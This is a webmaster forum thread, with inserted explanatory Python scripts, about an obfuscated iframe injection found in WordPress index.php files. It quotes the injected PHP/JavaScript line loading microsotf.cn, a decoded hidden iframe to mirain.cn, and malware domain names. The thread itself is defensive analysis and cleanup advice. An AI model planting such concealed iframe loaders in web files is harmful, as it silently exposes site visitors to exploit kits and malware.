Random Code Found at Bottom of index.php Files

Funky Bunch

New member
Jun 6, 2007
So...yea. Hoping someone better at this type of thing can help me out. I found the following line of code at the bottom of all index.php files for a wordpress install.

<?php echo '<script>document.write("<if"+''+'ra'+''+"m"+'e s'+"rc=\"h"+''+'tt'+"p:"+''+"/"+''+'/mic'+"roso"+'t'+''+'f.c'+"n"+'/'+"\" wid"+''+'th=1 he'+"igh"+''+'t'+"="+"2></i"+''+"f"+"ra"+''+""+''+"me"+'>');</script>'; ?>

As near as I can tell, it's trying to throw up a 1x2 pixel iframe for microsotf.cn? Apparently that site was just registered on the first of this month, and the IP is in Russia.

I only found it because my site threw up a php error when I visited it, and then I found that those files had been modified today. Found 2 other sites on my vps with the same issue. Other than the vps, the only similarities between the 3 are that they're all wordpress installed phpbay sites, but that's true for a couple other sites on my vps as well...

Anyone mind helping out with whatever comes to mind?
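The injected line above only hides its target by splitting the HTML into quoted fragments joined with '+'. The following scanner (an added example, not code from this thread or from WordPress) reassembles those fragments so you can see which iframe a file would emit, and walks a directory tree reporting every index file that carries such a payload. The sample line is the one quoted above, embedded as constructed input; the log format, file names and threshold values are assumptions.

```python
import re
import sys
from pathlib import Path
from typing import List, Optional, Tuple

# The injected PHP line quoted in the post, embedded here as the constructed sample input.
SAMPLE_LINE = r"""<?php echo '<script>document.write("<if"+''+'ra'+''+"m"+'e s'+"rc=\"h"+''+'tt'+"p:"+''+"/"+''+'/mic'+"roso"+'t'+''+'f.c'+"n"+'/'+"\" wid"+''+'th=1 he'+"igh"+''+'t'+"="+"2></i"+''+"f"+"ra"+''+""+''+"me"+'>');</script>'; ?>"""

# The payload is a document.write() whose argument is a chain of quoted fragments joined by '+'.
WRITE_RE = re.compile(r"document\.write\((.*?)\);\s*</script>")
# One quoted fragment in either quote style; backslash escapes (\" or \') are allowed inside.
FRAG_RE = re.compile(r'"((?:[^"\\]|\\.)*)"|\'((?:[^\'\\]|\\.)*)\'')


def decode_concat(expr: str) -> str:
    """Join "a"+''+'b'+... back into the string the browser would see, unescaping \\" and \\'."""
    # findall yields (double_quoted, single_quoted); exactly one of the two is non-empty per hit.
    return "".join(re.sub(r"\\(.)", r"\1", d + s) for d, s in FRAG_RE.findall(expr))


def decode_injections(text: str) -> List[str]:
    """Return the decoded HTML of every concatenated document.write() payload found in text."""
    return [decode_concat(m.group(1)) for m in WRITE_RE.finditer(text)]


def iframe_src(html: str) -> Optional[str]:
    """Pull the src attribute out of the decoded iframe, if there is one."""
    m = re.search(r'src=["\']?([^\s"\'>]+)', html)
    return m.group(1) if m else None


def scan_tree(root: Path, names=("index.php", "index.html")) -> List[Tuple[str, int, str]]:
    """Walk root and report (path, line number, iframe src) for each injected line in index files."""
    hits = []
    for path in root.rglob("*"):
        if path.name not in names or not path.is_file():
            continue
        for lineno, line in enumerate(path.read_text(errors="replace").splitlines(), 1):
            for html in decode_injections(line):
                hits.append((str(path), lineno, iframe_src(html) or html))
    return hits


if __name__ == "__main__":
    # Usage: python scan_iframe.py /path/to/docroot   (defaults to the current directory)
    for hit in scan_tree(Path(sys.argv[1] if len(sys.argv) > 1 else ".")):
        print("%s:%d injects iframe -> %s" % hit)
```

Running it over the quoted line decodes to `<iframe src="http://microsotf.cn/" width=1 height=2></iframe>`, which matches the OP's reading; a hit is a reason to restore the file from a known-good copy and rotate the credentials that can write to it.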
 


It probably tries to load an exploit which downloads and executes a keylogger to steal CC numbers etc.

Get it removed ASAP and change appropriate passwords, look for new user accounts and look for any suspicious php files.
 
Thanks for the replies guys.

Somehow they got hold of my ftp logins for 4 sites on that vps, and just downloaded/uploaded a bunch of php files with that code added. Not sure how, really, since I do daily scans with multiple programs, but I guess even the paranoid get crap like this happening.

Changed my passwords and hopefully cleaned up everything...hope I didn't miss anything. :uhoh2:
 
It's a common iframe attack, as people have said. Look for files without extensions that could still be on the system.
 
It's a common iframe attack, as people have said. Look for files without extensions that could still be on the system.

Something about you gives me the jeebies ... I think it was a post a while ago where you showed off way too much sql knowledge.

Whew, now that I've got that off my chest ... can I look inside your bag of tricks?
 
Backup your wordpress database.

Delete your wordpress files (all of them)

Download the latest 2.8 version of wordpress and edit the config file to point to your database.

And of course change your password (as you already seem to have). They probably didn't get your FTP info, but rather used an exploit in an older version of wordpress, since those kinds of attacks are usually automated these days.
 
I had something similar happening to an e-commerce site I help run. They inserted heavily obfuscated JS code at the end of common files, such as login.php, index.php etc. When de-obfuscated, it produced this code:
Code:
<iframe name=c18 src='http://mirain.cn/sv/index.php?8da46bb6c' width=70 height=438 style='visibility:hidden'>
</iframe>

The FTP log showed access from an IP in Latvia. I could see how they downloaded the files and re-uploaded them less than a second later with the script inserted - obviously automated.

I only caught this because one day when loading our homepage, Safari on a Mac spit out an error:
The page [My e-commerce site] has content of MIME type "video/x-ms-wmv". Because you don't have a plugin installed for this MIME type, this content can't be displayed.
This was a legit browser error, not one of those fake "You're missing a plugin" lures; WMV = Windows Media Video, not installed on a default Safari. But there is no such media on our normal homepage.

At first, we just removed the inserted script by overwriting the site from a backup, but within hours they inserted it again. It stopped after we changed passwords.

Our FTP pwd was an 8-character mix of letters and numbers, not in any dictionary. Although it seems ok for now, I'm afraid if they broke in once, they could do it again unless we fix the specific exploit they may have used. And I don't know what that is, which makes me feel very iffy about this.
 
I would say get rid of footprints on any standard especially Open Source software you are using. I keep getting tons of people searching for "Powered by Wordpress" "keyword1 keyword2" "Name (required)"

Obviously they are looking for Wordpress to spam comments, but the same things are done on all software modules. Change the footers and comment footprints around a bit...
 
Really appreciate everyone's help and suggestions. Found a 5th site of mine with a different host that had also been affected, so I've been having fun cleaning that up.

Does anyone know of a specific tool that can scan your site for you to detect this type of crap early on? I'd have had no idea anything was wrong if my sites hadn't been throwing up errors, and I don't really like the idea of always having to go through all the files of my sites on a regular basis.
 
Something about you gives me the jeebies ... I think it was a post a while ago where you showed off way too much sql knowledge.

Whew, now that I've got that off my chest ... can I look inside your bag of tricks?

haha - don't worry about me. I'm all good. I have no need to trouble anyone. I am but a humble soul working in the banking industry (online) with a penchant for web application security and programming. So...anytime you got a question about either, feel free to pm me.

EDIT:

@OP - you probably had a link to the new 0 day exploit for IE running off your site.
 
Damnit these threads scare the piss out me. When you brilliant bastards are stumbling, people like me are fucked.
 
Ikonic, since you seem knowledgeable, do you have any idea how someone would be able to break into an FTP account to do this shit (see my post #10 above). Or, more specifically, what I can do to prevent this in the future?
 
ScanSafe STAT Blog - Malware Ads Hit PirateBay

ThePirateBay and other torrent and ROM sites were victims of malicious ads over the past weekend. The malicious ads employed PDF exploits which attempted to download malware onto visitors' computers. The ads were delivered via ad.yieldmanager.com. Malware domains used included:

aralowsiv.com
microsotf.cn
zabicks.com


y'all probably have a trojan. i bet everyone infected has their ftp credentials stored locally. good luck
 
Ikonic, since you seem knowledgeable, do you have any idea how someone would be able to break into an FTP account to do this shit (see my post #10 above). Or, more specifically, what I can do to prevent this in the future?

You got the 0 day.

Unless your site is high volume, chances are it was an automated attack using ftp details picked up via a keylogger or trojan on one of the computers used to access the site. This could be your computer, the hosting company's computer or any computer transmitting the data between you and the server (ftp isn't secure).

To confirm this look at the ftp logs. Single login, 1 time only? If so they had details before you did. If not, perhaps a brute force attack and you can tell that by the velocity of login attempts per x.

Also, which ftp account was used and does it have a default password? Use that to work off and change your ftp password regularly, make sure you have AV, firewall and malware removal software on all computers used to connect to the site... and better yet use sftp if you can to connect.

Finally, create separate user accounts for each person with ftp access to the server so it's easy to isolate if it happens again (since they are already getting the info).
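The log check described in the post above, as an added example that is not Ikonic's own script: per client IP and account it counts failed logins before the first success and the time span they took, so a single clean login (credentials already known, typically stolen from a client machine) stands out from a burst of failures followed by a success (brute force). The log format is a simplified, constructed one; real vsftpd/pure-ftpd lines differ, so adapt the regex. The failure threshold is an assumption.

```python
import re
from collections import defaultdict
from datetime import datetime
from typing import Dict, Tuple

# Constructed sample FTP log (simplified format, not from the thread). Three stories:
# a burst of failures then success, a first-try success followed by an upload, and a
# client that never got in.
SAMPLE_LOG = """\
Jun 06 03:12:01 FAIL LOGIN: Client "198.51.100.7" user "webadmin"
Jun 06 03:12:03 FAIL LOGIN: Client "198.51.100.7" user "webadmin"
Jun 06 03:12:04 FAIL LOGIN: Client "198.51.100.7" user "webadmin"
Jun 06 03:12:06 FAIL LOGIN: Client "198.51.100.7" user "webadmin"
Jun 06 03:12:07 FAIL LOGIN: Client "198.51.100.7" user "webadmin"
Jun 06 03:12:09 FAIL LOGIN: Client "198.51.100.7" user "webadmin"
Jun 06 03:12:10 OK LOGIN: Client "198.51.100.7" user "webadmin"
Jun 06 04:40:22 OK LOGIN: Client "203.0.113.45" user "site2ftp"
Jun 06 04:40:23 OK UPLOAD: Client "203.0.113.45" user "site2ftp" "/public_html/index.php"
Jun 06 09:15:00 FAIL LOGIN: Client "192.0.2.99" user "admin"
Jun 06 09:15:30 FAIL LOGIN: Client "192.0.2.99" user "admin"
"""

LINE_RE = re.compile(r'^(?P<ts>\w{3} \d\d \d\d:\d\d:\d\d) (?P<result>OK|FAIL) LOGIN: '
                     r'Client "(?P<ip>[\d.]+)" user "(?P<user>\w+)"')


def triage(log_text: str, fail_threshold: int = 5) -> Dict[Tuple[str, str], dict]:
    """Per (client IP, user): failures before the first successful login, the seconds from the
    first attempt to that success, and a verdict. fail_threshold is an assumed cut-off."""
    events = defaultdict(list)
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if m:  # only LOGIN lines matter here; uploads etc. are ignored
            ts = datetime.strptime(m.group("ts"), "%b %d %H:%M:%S")
            events[(m.group("ip"), m.group("user"))].append((ts, m.group("result")))
    report = {}
    for key, evs in events.items():
        evs.sort()
        first_ok = next((i for i, (_, r) in enumerate(evs) if r == "OK"), None)
        if first_ok is None:  # never got in: worth watching, but no compromise via this path
            span = (evs[-1][0] - evs[0][0]).total_seconds()
            report[key] = {"fails": len(evs), "span_s": span, "verdict": "failed-only"}
            continue
        span = (evs[first_ok][0] - evs[0][0]).total_seconds()
        verdict = "brute-force" if first_ok >= fail_threshold else "credentials-known"
        report[key] = {"fails": first_ok, "span_s": span, "verdict": verdict}
    return report


if __name__ == "__main__":
    for (ip, user), info in sorted(triage(SAMPLE_LOG).items()):
        print(f"{ip:15} {user:10} fails={info['fails']:3} span={info['span_s']:6.0f}s {info['verdict']}")
```

A "credentials-known" verdict on an account that then uploads index files is the signature Ikonic describes: the password was already in the attacker's hands, so look at the client machines and rotate the credential rather than hunting for a server-side hole.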
 
I got this on a server I manage not long ago. From what I've seen, I believe it is a Wordpress exploit. I wrote a script to scan all files on the server for known exploit strings, and remove them. Sorry I don't have the script anymore, or else I would post it up. Good luck.
 
I got this on a server I manage not long ago. From what I've seen, I believe it is a Wordpress exploit.

I wouldn't be so quick to say it's a WP exploit - I saw this on a site I manage (about three weeks ago) that was custom-coded and didn't use WP (or even a database). So I think the vulnerability lies with the FTP account (i.e. sniffing for passwords) rather than a specific type of software or CMS or whatever.

All the script looks for (the malicious script) is a standard index file (index.php, index.html) and it inserts the concealed code.
 
Were there any other sites on the server running wordpress? I'm not 100% on the wordpress thing, and it surely could have been the result of a keylogger on a client machine. An outdated Wordpress install just seemed to be the common factor between all cases I've seen. On the machine I cleaned up, it had been hit several times by many different attackers. Some only injected code on index.* files, others *.html, others *.php. Being that it was obviously hit by many different attackers made me think that it was a software vulnerability.